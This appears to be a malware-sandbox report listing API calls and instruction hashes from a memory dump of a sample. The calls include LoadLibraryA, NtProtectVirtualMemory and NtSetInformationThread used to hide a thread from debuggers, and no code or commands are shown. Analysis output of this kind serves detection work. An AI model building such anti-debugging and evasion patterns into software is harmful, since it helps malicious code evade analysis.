                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InitializeLibraryLoadThunk
                                                        • String ID:
                                                        • API String ID: 3353482560-0
                                                        • Opcode ID: bb532f051dfd21291e202a00a99ea3b3961ee3f75c872b3177524842620d1c79
                                                        • Instruction ID: cf9544810f95148096939c3a2988cf60d6ae5f38a386f5d7640d5ab19fafb579
                                                        • Opcode Fuzzy Hash: bb532f051dfd21291e202a00a99ea3b3961ee3f75c872b3177524842620d1c79
                                                        • Instruction Fuzzy Hash: C321F230609385DECF319F7089653DA3FA6BF57300F94809DC8C60B246C6719A92CB56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: f373ff59f2da95f4e15a98af819a43af112046dd9b9576814cd739a1052f9288
                                                        • Instruction ID: d840b9b5ef3cb827d6aebcc12b8967cb402166690eaa262101d2750586ead8e4
                                                        • Opcode Fuzzy Hash: f373ff59f2da95f4e15a98af819a43af112046dd9b9576814cd739a1052f9288
                                                        • Instruction Fuzzy Hash: 53217F30A08347A9FF313A244D953FB11AA8F537A4F94820ADCCFA55C2DB7AC446CE12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InitializeLibraryLoadThunk
                                                        • String ID:
                                                        • API String ID: 3353482560-0
                                                        • Opcode ID: a8f47cd8bfd176a9a45fb71e2dd75d37ff2d62798f247bf600acef8271212521
                                                        • Instruction ID: 5e4b59379575f664ba60fe1842d2ff873565cdd7159c119363e5c955a4703b30
                                                        • Opcode Fuzzy Hash: a8f47cd8bfd176a9a45fb71e2dd75d37ff2d62798f247bf600acef8271212521
                                                        • Instruction Fuzzy Hash: AF210331609385DECB32DF7089653D63FA6BF53300F98809DC8C60B257D6719692CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: d53b5a38651cf046f9b0eb19b4a1965fc6000e0245c7d79b2b6d6c7520557555
                                                        • Instruction ID: 3fbcf86f077d5dea19a7dff7f6a5b4455290f5c865aaaf69b906c0cb960a42f2
                                                        • Opcode Fuzzy Hash: d53b5a38651cf046f9b0eb19b4a1965fc6000e0245c7d79b2b6d6c7520557555
                                                        • Instruction Fuzzy Hash: 87117A30508383A9FF313A244E953FB156A8F537A4F94820ADCCEE55C2DB6AC4468D13
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: b2180ac25b0cbb199004b772462b1fb8904c97856a225eb23bab9030416623cc
                                                        • Instruction ID: 3f26969d185e56525d81fd678e5b75607a549b84e6a10e6b2adf4859bc76c90b
                                                        • Opcode Fuzzy Hash: b2180ac25b0cbb199004b772462b1fb8904c97856a225eb23bab9030416623cc
                                                        • Instruction Fuzzy Hash: AF01A1F453930AEADE3025641AB67BFC11E9F43680E54412AAC8352CC7D7168489CD53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: fb24c488b5044c696f7696bfaac95e86a37303cb4c2cdaabbda19589aed33dd0
                                                        • Instruction ID: f31ee88b6533f5dcb71937e3757d78ffdc75514df97a85c539c39870afb54ef0
                                                        • Opcode Fuzzy Hash: fb24c488b5044c696f7696bfaac95e86a37303cb4c2cdaabbda19589aed33dd0
                                                        • Instruction Fuzzy Hash: 130180F453A30AEADE7025205AA67BFD22E9F43694E54411BAC8351CC7D7168489CD93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 640d5228e5f8fdead6fbb742b0f39d8b04d0784f96f3e16c873dcd914fc34bf7
                                                        • Instruction ID: c39439b41571a8e2ba0c7135ccf70a33c6bf0556a2767965053f894530f6cd70
                                                        • Opcode Fuzzy Hash: 640d5228e5f8fdead6fbb742b0f39d8b04d0784f96f3e16c873dcd914fc34bf7
                                                        • Instruction Fuzzy Hash: 2E0192F4539309EACE3029641AB57BFC21E9F43680F544127AC83428C7E7158489CD53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 54541f45f48eb4e19d243a0b9e20df71c62ac8de5604a94d1efceb5abd9539a6
                                                        • Instruction ID: 7a1354e35b150cc241c6117e6b0376bf84a816d331b9314b7fef63282537fc65
                                                        • Opcode Fuzzy Hash: 54541f45f48eb4e19d243a0b9e20df71c62ac8de5604a94d1efceb5abd9539a6
                                                        • Instruction Fuzzy Hash: EB116B30408383A5EF317A244D987FE296A9F533A8F94834ADCDEA54C2CB7A81468D53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: d772ca012026c968fa7a5bc169b749c962b791a9909a5bcbb9116934d7c1d8a6
                                                        • Instruction ID: b7448f28e63e5dc3fba492ad5326cd3f136122cb04f17cf3b95f8615dce0bd4e
                                                        • Opcode Fuzzy Hash: d772ca012026c968fa7a5bc169b749c962b791a9909a5bcbb9116934d7c1d8a6
                                                        • Instruction Fuzzy Hash: C40171F4539309EACE303A645AA57BEC21E9F43294F545527AC83429C7D715C48ACD53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 169c4a5b346f7725ff90be20c3c8b7837f773b920d3ae0331fba71e65efc9b92
                                                        • Instruction ID: b0d55f2a156f8c90555e290fddf3f0b309889c8fda20ddee1382b5879d188577
                                                        • Opcode Fuzzy Hash: 169c4a5b346f7725ff90be20c3c8b7837f773b920d3ae0331fba71e65efc9b92
                                                        • Instruction Fuzzy Hash: FC018FF4538209EADE303A641AA47BEC22EDF43690F645527AC83429C7D725C489CD93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 886ef857fc8d5eef712dfda2218d2ca5b6d7b70dc7ebbe9544df813f1f67ae7e
                                                        • Instruction ID: d86bdf78facfb99327a281983c3c7127d83b2330dcfaeb1c385b3ddb4ed32e85
                                                        • Opcode Fuzzy Hash: 886ef857fc8d5eef712dfda2218d2ca5b6d7b70dc7ebbe9544df813f1f67ae7e
                                                        • Instruction Fuzzy Hash: 5C01A2F4538209EADE303A641EA47BEC22EDF43290F644527AC83429C7D725C489CD93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 9a0303705e772955f66e667085258e324599d7390d5d812dcf470eec31f1696a
                                                        • Instruction ID: 15fb06a4cff0a329a52578635b20d1011180a56727dadcf357231124ffc6529d
                                                        • Opcode Fuzzy Hash: 9a0303705e772955f66e667085258e324599d7390d5d812dcf470eec31f1696a
                                                        • Instruction Fuzzy Hash: 5C019030419383D5EF317F244D943FE19A99F13798F944149DCCEA2582C776C045CE52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8b4efb3a53060e2619d3023ba80e8e3373922b10505acf09358484447450fb9e
                                                        • Instruction ID: 3d702d8502e405ece45f7a5cc70becf802035d793a6fb237e1b0d46fbe26a439
                                                        • Opcode Fuzzy Hash: 8b4efb3a53060e2619d3023ba80e8e3373922b10505acf09358484447450fb9e
                                                        • Instruction Fuzzy Hash: AFF0AFF453820AE7CE703A2459A47BEC22EDF43254F604127AC83419D7DA25C48ACC93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationProcessTerminateThread
                                                        • String ID:
                                                        • API String ID: 1477408370-0
                                                        • Opcode ID: 79b8a480b72e587196e3a68fadb3861aa741b7250e63a0edbe45194d7b3c70ee
                                                        • Instruction ID: 531661639460229485db018ef3fcbf97c5ad937d908cbf747ba094f878d8988f
                                                        • Opcode Fuzzy Hash: 79b8a480b72e587196e3a68fadb3861aa741b7250e63a0edbe45194d7b3c70ee
                                                        • Instruction Fuzzy Hash: 60F07D30408783A9EF226A2409403BE1AAA6F63794F584348DCDDB3582E35680058A01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: b8c2d5c9674162a28f11f465596f757475eb1c411078c072abc74f2dc393bfc4
                                                        • Instruction ID: af9c3aa6de838f7cca24ff365212aac30fb2f1cdb63c891ffc0270eeff7ba6a9
                                                        • Opcode Fuzzy Hash: b8c2d5c9674162a28f11f465596f757475eb1c411078c072abc74f2dc393bfc4
                                                        • Instruction Fuzzy Hash: 73F0B4F4538209D7CE70392419B43BEC21EDE43240F504126AC83419C6D725C889CD93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 1f481994fae8e622628307ae30d67954bb70f2e924fb9427be3f270d1ca41bc6
                                                        • Instruction ID: 3f82fc5c5b469c0b9711c64cd2d5ef94a0058629d5b401b98aff70e2781f7678
                                                        • Opcode Fuzzy Hash: 1f481994fae8e622628307ae30d67954bb70f2e924fb9427be3f270d1ca41bc6
                                                        • Instruction Fuzzy Hash: D3F0E9F0638349D79E24293559656BFE729DE43690F00862BEC53859DBD734C84ACEC3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationProcessTerminateThread
                                                        • String ID:
                                                        • API String ID: 1477408370-0
                                                        • Opcode ID: 3525a619666adff4fc8b5bca3ddb2d158128004b5d88d0ca195d47eb1484f608
                                                        • Instruction ID: 4aa46de369c9904a91960f926a350367ca46627305bed3ac79e6dbb08ccc7f7d
                                                        • Opcode Fuzzy Hash: 3525a619666adff4fc8b5bca3ddb2d158128004b5d88d0ca195d47eb1484f608
                                                        • Instruction Fuzzy Hash: 69F08B30009382A5EF226B240D943BE2ABDAF63798F588249DCDE67482D36AD4058A01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: b8b96e2fbff57e8a0faf1c8da1ef3bc99e62aaf35e5852d8876614ffdd8de236
                                                        • Instruction ID: 8d1b66f4b174352a715cb7ca9b686c905664085a6261e7fa7d0b97dc7563aaee
                                                        • Opcode Fuzzy Hash: b8b96e2fbff57e8a0faf1c8da1ef3bc99e62aaf35e5852d8876614ffdd8de236
                                                        • Instruction Fuzzy Hash: C2E01AF4638209D78E60296166B46BFD22EDE83294B54852BEC434589ADB35C886CD93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 71dd269ab2000d073b8cc9dbbbf0cd258fa8ec802529a4348abd31b5a8e4da89
                                                        • Instruction ID: a9bc9929aaf63f3800a818c92dd621a1e64e7372157900e256e14eeb62e1e896
                                                        • Opcode Fuzzy Hash: 71dd269ab2000d073b8cc9dbbbf0cd258fa8ec802529a4348abd31b5a8e4da89
                                                        • Instruction Fuzzy Hash: 37D05BB4574705868F617E6524A02EED759DE83614758842FFCC387481D730C981CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ff7960f0fa0ba51e97310fdd711abebab7a841e1bf531cfdffa79f8a098cee66
                                                        • Instruction ID: 105530ca6e8c2ad4a6b5c2aa069ac2cca44127d1f34522fe05e74f5b523a53d2
                                                        • Opcode Fuzzy Hash: ff7960f0fa0ba51e97310fdd711abebab7a841e1bf531cfdffa79f8a098cee66
                                                        • Instruction Fuzzy Hash: 05D09775080300CACA20AFB0082A3973B54DB42212BD8C08DCC820BB2ADF3057E3A792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 3db2ecca4648894eedd2c9ab40f9b566cbe845a48c138c0f3695eda58f12fdbf
                                                        • Instruction ID: 91d285f99d5a5e9627a4c0fe4e9a311445ae0f96ba8873d77fe3adb1e37af954
                                                        • Opcode Fuzzy Hash: 3db2ecca4648894eedd2c9ab40f9b566cbe845a48c138c0f3695eda58f12fdbf
                                                        • Instruction Fuzzy Hash: FBD012B4674319968F603EA975902EED729EF82650B98C436FC97C6541E731C981CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02394748,02394848,023909A5,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188), ref: 02394800
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0ee61934e80bfff59d476dd18376ce3430556a6d0412635a2e8109dcd738f292
                                                        • Instruction ID: b4a8581bd070d19b934594a782dda074de5c28e03762a04ea6bbb7b8de25311f
                                                        • Opcode Fuzzy Hash: 0ee61934e80bfff59d476dd18376ce3430556a6d0412635a2e8109dcd738f292
                                                        • Instruction Fuzzy Hash: A6D08034794304FEFA3089205D57FD751675B51F40F91410DFF053E0C146F24A90C615
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 856af21b141aefc672be12f751068224b2c860da352b2a854af1dec12d8ab2d3
                                                        • Instruction ID: d76aa5ca3ee51800c53ebc6a208ef3486ce63020cb9f77f11adb444501786e1a
                                                        • Opcode Fuzzy Hash: 856af21b141aefc672be12f751068224b2c860da352b2a854af1dec12d8ab2d3
                                                        • Instruction Fuzzy Hash: E2B02B7872000049CFA03AEC38501EC82129EC19003188039B881C3000C730CC804281
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 7ed2a1b14bf1e4110230a3a866d8d03a77303d957bc95fc2f733bb7b27c7bcd3
                                                        • Instruction ID: a93a753e008bd353a3bc5415005f2f4b1ae337bf075d13dcee92d236fa20c97d
                                                        • Opcode Fuzzy Hash: 7ed2a1b14bf1e4110230a3a866d8d03a77303d957bc95fc2f733bb7b27c7bcd3
                                                        • Instruction Fuzzy Hash: D4C02B3014430051DE200D102C1174822C49F1372BF1043117ABFB02D2E510C0068500
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 7944cd159f944f43e2a8164d0eeb655e4838f1ec5eba7ba0123855663fdbb86d
                                                        • Instruction ID: ba23bcfd22ded9caf07c4db6cbb80c3b41b76103396b17d86083450afb3f8394
                                                        • Opcode Fuzzy Hash: 7944cd159f944f43e2a8164d0eeb655e4838f1ec5eba7ba0123855663fdbb86d
                                                        • Instruction Fuzzy Hash: 7AE10871740B03FFEF149E28CCA0BE7B3AABF16750F444229EC9993641D725A895CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 0bc3ce0ebeb140bf943569e3635a4f67f76f30655da015b000f956dece8e40b4
                                                        • Instruction ID: 38e3798105075a2402e91879f4db9c16b3c45a585b43a3105c8bb496e550eb64
                                                        • Opcode Fuzzy Hash: 0bc3ce0ebeb140bf943569e3635a4f67f76f30655da015b000f956dece8e40b4
                                                        • Instruction Fuzzy Hash: 43610A71908342CECF359F28C5D47A5BB96AF93370F58829AD9938B6D7C3318486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: fb9928bf1b2e27db19cf0ac7e14fa4034239ae00af3e982100586248d704743d
                                                        • Instruction ID: a67a705a0e4d7431c5027ca87a2ef0ec71d65ea43b0402376f086c1e5a09da78
                                                        • Opcode Fuzzy Hash: fb9928bf1b2e27db19cf0ac7e14fa4034239ae00af3e982100586248d704743d
                                                        • Instruction Fuzzy Hash: C0510771908342CECF359F28C5947A5BB96AF93270F58829AD9938B6D7C3718486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 388fa61b61bad496bbcb4f84cc4526106e3b138727760788a8bb8e0d7015160d
                                                        • Instruction ID: 0fce5bc8f493d0aa6adabdbc302c5394a23fdeee508dc371df3657e89a263494
                                                        • Opcode Fuzzy Hash: 388fa61b61bad496bbcb4f84cc4526106e3b138727760788a8bb8e0d7015160d
                                                        • Instruction Fuzzy Hash: E2510971908341CECF318F28D8D47A5BB96AF53270F59829AD5928B6D7C3708486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
